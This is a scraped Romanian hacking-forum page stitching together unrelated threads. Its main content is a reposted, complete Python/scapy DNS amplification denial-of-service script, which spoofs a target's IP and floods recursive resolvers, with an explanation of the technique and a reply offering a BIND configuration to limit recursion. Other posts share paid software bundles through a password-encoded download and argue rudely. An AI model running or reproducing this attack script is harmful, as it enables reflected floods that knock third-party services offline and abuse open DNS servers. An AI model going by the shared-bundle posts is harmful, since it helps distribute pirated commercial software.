Leaderboard

Ceva doritori? Astept mesaj in privat! L.E: Cei care au primit, rog sa confirme aici ca sa stie lumea ca sunt ok si nu fac magarii. Mersi

https://collaboration.skype.com/promotion/?cm_mmc=AFCJ|1250_B1-_-10576637-5918295

Ca tot am vazut ca nu e postat.. The below code is a proof-of-concept side-project written by myself and Jon Ferretti to learn more about the TCP/IP stack, as well as to aid us in our schools Red vs. Blue competition. In a Denial of Service (DOS) attack, the goal is quite literally do what the name implies - bring down the services in an effort to prevent other people from being able to access them. Generally speaking, the "typical" method for such an attack is to flood the targeted server with so much traffic that nobody else can access the services. So naturally as the attacker, the more data you can send, the better. A DNS Amplification Attack exploits a feature of the DNS stack, specifically the recursive capability. Before I explain recursion, let us first re-examine the basics of DNS. In its most simplistic form, every website (or other server) has a publicly facing IP address. For a user to connect to that website, their browser must know what that IP address is. This is where the magic of DNS comes in. When a user types in a web address, their browser asks a DNS server who the address belongs to. The DNS server responds, giving the browser the IP to connect to, at which point the browser establishes a connection and brings the user to the website. Given the sheer volume of websites that exist on the Internet, it's not difficult to understand why there are a multitude of DNS servers around the world. DNS recursion plays a vital role in ensuring that users globally can access websites that the DNS server closest to them may not be aware of (a single DNS server simply cannot keep track of every domain). When the DNS server cant come up with a match for the URL requested, it asks its' superior. This "asking" is called recursion. When a server along this recursive chain comes up with a response, it is sent back to the original client that requested the translation (URL to IP Address). This process seems perfectly reasonable, and in many cases, is. The catch 22 though is that with each recursive hop to find a translation, the size (packet size here) of the result gets larger. Couple that concept with some packet crafting and the end result can be disastrous. This script exemplifies this concept. By crafting packets being sent to a DNS server that allows for recursion, the attacker can make a normal query that is 64 bytes in size, return a response that is tens of times larger than the original request (as seen below). This image demonstrates the principle described above. As dig merely decodes responses, we can see that qr is set, which tells us nothing other than what we're looking at is a Query Response. The second flag we have returned is rd, which indicates that dig requested recursion in the query. The last flag we see is ra, which tells us exactly what we wanted to see - that recursion was available (and subsequently used) to gather the data in our response. When we look at the query information, at the bottom of our query, we see the response returned was 4.192 bytes in size (roughly sixty-five times larger than our initial request) --= More to come =-- ## DNS Amplification DOS Attack Script - Proof of Concept # # Co-Authored Johnathin Ferretti and Pat Litke # # Pat Litke | geudrik # Jonathin Ferretti | LISTERINe # # January 2012 # # # # Dependencies # python-scapy # python-dnspython # # # Basic imports to do simple I/O from optparse import OptionParser from string import lower from os import path, system # Ensure that switches are set before we do much of anything else. # This ensures that system resources aren't unnecessarily used system("clear") print "###########################################################" print "### DNS Amplification DOS Attack - Proof of Concept ###" print "### ###" print "### Co-Authored : LISTERINe and geudrik ###" print "### Jon Ferretti & Pat Litke ###" print "### Last Modified : January 2012 ###" print "###########################################################" print "\n\n" parser=OptionParser() # Required Parameters parser.add_option("-t", "--target", action="store", dest="target", help="IP address of our target") parser.add_option("-s", "--servers", action="store", dest="servers", help="Path to our list of recursive DNS servers") parser.add_option("-a", "--arecords", action="store", dest="arecords", help="Path or our list of A-Name records") # Optional Parameters parser.add_option("-c", "--count", action="store", dest="count", default=5) parser.add_option("-v", "--verbose", action="store_true", dest="verbose") parser.add_option("--threads", action="store", dest="threads", default=1) parser.add_option("--verify", action="store_true", dest="verify") (options, args)=parser.parse_args() # Check to see that at least -t -s and -a are set as they are required if not options.target or not options.servers or not options.arecords: print "Options are as follows" print "-t : Target IP Address" print "-s : Path to Server File" print "-a : Path to A Record FIle" print "-c : -1 for infinite, \# of times to send packets" print "--verify : Verify that DNS servers are indeed recursive" print "-v : Set verbosity to true" print "--threads : Number of threads to spawn" print "\n" print "Example Usage\n" print "amplfiy.py -t 1.2.3.4 -s /usr/so.list -a /usr/arec.list -c \"-1\" --verify -v --threads=4" exit() else: print "All checks have passed successfully. You are about to launch" print " a DOS attack against "+options.target print "The following are the options passed..." print "Target : "+options.target print "Servers : "+options.servers print "A-Names : "+options.arecords print "Send Count : "+str(options.count) print "Verify Servers? : "+str(options.verify) print "Verbosity? : "+str(options.verbose) print "Thread Count : "+str(options.threads) proof=lower(raw_input("Are you sure you want to execute this attack? (Y/N)")) if proof=="n": exit() # Clear our buffer and continue on... system("clear"); ## ##### ##################################################### # Sanitation code for our DNS amplification script ##################################################### ##### ## from dns import flags, resolver from os import path, system from sys import argv, stdout from random import randrange, seed from threading import Thread import logging # Supress IPv6 warnings... logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * ### Sanitize our A-Records List def pull_clean_servers(server_filename, verbose): # Populate our array serverlist try: handle = open(path.abspath(server_filename), "r") serverlist = handle.readlines() if verbose: print "Pre-sanitation: File opened and lines read" except: print "Bad filepath, cannot open file for reading "+server_filename exit() # For each server in our serverlist (see above), clean it clean = [] for server in serverlist: try: clean.append(server.strip()) if verbose: print "Server Cleaned: "+server except: print "Unable to parse servername: "+server exit() print "\n=== Sanitation Complete ===\n\n" return clean ## ##### #################################################### # Verification Code for our Name Servers #################################################### ##### ## def verify_ns(nslist, verbose): if verbose: print "Now verifying nameservers..." verified = [] for server in nslist: try: # Send our DNS request to the server answer = resolver.query(server) # Read DNS flags from response and check for RA flag DNSflags = (flags._to_text(answer.response.flags, flags._by_value, flags._flags_order)).split(" ") if "RA" in DNSflags: verified.append(server) if verbose: print "Server "+server+" is recursive" except: # Server is not recursive print "Server "+server+" is *NOT* recursive" return verified ## ##### #################################################### # Thread Class to handle our our Multi Threading #################################################### ##### ## class sender(Thread): # Define our __init__ struct def __init__(self, threadnum, data_package): Thread.__init__(self) self.data = data_package self.tnum = threadnum self.target = data_package[0] self.name_servers = data_package[1] self.A_records = data_package[2] self.send_limit = data_package[3] self.verbose = data_package[4] # Define our "push_dns_packets" struct def run(self): print "seeding..." seed() pac_num = 0 while self. send_limit != pac_num: ns = self.name_servers[randrange(0,len(self.name_servers))] A_record = self.A_records[randrange(0,len(self.A_records))] if self.verbose: print "| Sending Packet: "+str(pac_num+1)+" |", "Thread Number:", str(self.tnum)+" |", "Target:", self.target+" |", "Name Server:", ns+" |", "A-Record:", A_record+" |" # Send the packet :D send(IP(dst=ns, src=self.target)/UDP()/DNS(rd=1,qd=DNSQR(qname=A_record)), verbose=0) pac_num+=1 # Define our "run" struct #def run(self): # self.push_DNS_packets(self.tnum, self.data[0], self.data[1], self.data[2], self.data[3], self.data[4]) ## ##### ##################################################### # Let's start assigning variables and threadding ##################################################### ##### ## # Assign vars to be used in our threads. We'll do this one at a time to see where things break (if they do) try: Target = options.target except: print "Script Broke - Target assignment failed" exit() try: Nameservers = pull_clean_servers(options.servers, options.verbose) except: print "Script Broke - Nameservers assignment failed" exit() try: A_Records = pull_clean_servers(options.arecords, options.verbose) except: print "Script Broke - A_Records assignment failed." exit() # Things are sanitized. Do we need to verify our name servers? if options.verify: try: Nameservers = verify_ns(Nameservers, options.verbose) if options.verbose: print "Nameserver Verification Successful..." except: print "Errors were encountered (see above) in nameserver verification" print "You may continue, but the above nameservers will be ignored" ns_error=lower(raw_input("Would you like to still try the attack (suggest not)? (Y/N) :")) if ns_error=="n": exit() # Pause so we can see diagnostic output finalcheck=lower(raw_input("This the last chance you get. Are you sure you want to continue?")) print finalcheck if finalcheck=="n": print "n" exit() print "running" # So here we go, lets fire up some threads sendthreads = [] for thread in range(0,int(options.threads)): sendthreads.append(sender(thread+1, [Target, Nameservers, A_Records, int(options.count), options.verbose])) sendthreads[thread].start() Sursa: https://arcti.cc/python_dns_amplification.html

Daca tot este data o metoda de atac DNS Amplification, ar fi interesant sa fie si o solutie pentru asta. O solutie de a mitiga aceasta forma de atac 'low end' este sa configurati bind (named) sa permita 'recursive queries' DOAR de la surse bine stabilite. De exemplu: Fisier: 'named.conf' // lista prefixe, acl acl recurseallow { 216.156.100.0/24; 210.134.32.0/23; 188.243.11.0/24; }; options { // alte optiuni ... recursion no; allow-recursion { recurseallow; }; } Desigur, sunt si alte optiuni, mult mai bune si mai eficiente. Multumim pentru post silvian0 // edit @Byte-ul: Nu e frumos sa faci asa si nici nu cred ca trebuie traducere in lb. Romana. IT-ul se invata in Engleza.

+rep Scuze ca ma bag peste, dar am zis sa dau si eu ce am, daca aveti nevoie de ceva din lista pm + name. //Edited am si wpml cumparat. The Mobile Bundle (este o oferta anuala si contine cam asta) Am primit si eu, merci.

Aici aveti tot pachetul exceptie facand Whiteboard Pack - Make Your Own Story pentru ca avea aproape 700MB (il pot oferi la cerere) Download envato.zip from Sendspace.com - send big files the easy way PM pentru parola. Va fi criptata, ceva simplu, folositi crypo pentru decriptare. AER256->?->ATOM128 PAROLA: 2111157.164114856, 2305008.8934531836, 1661499.043650437, 1036642.3327240949, 2109134.0060324594, 1550483.8452484396, 1421880.4458077403, 1745521.2348364545

Ai vazut ca nu e postat... si ce sa faci si tu, dai copy-paste din alta parte fara sa explici cu ce se mananca sau sa faci macar un TL;DR in romana/engleza. Multumim, da nu prea.

Du-te ba acasa. Tradu-ti singur, nu sunt ma-ta sa iti dau mura in gura. E scris destul de clar despre ce e vorba, nu-ti convine nu citi sau cauta-ti singur materialul.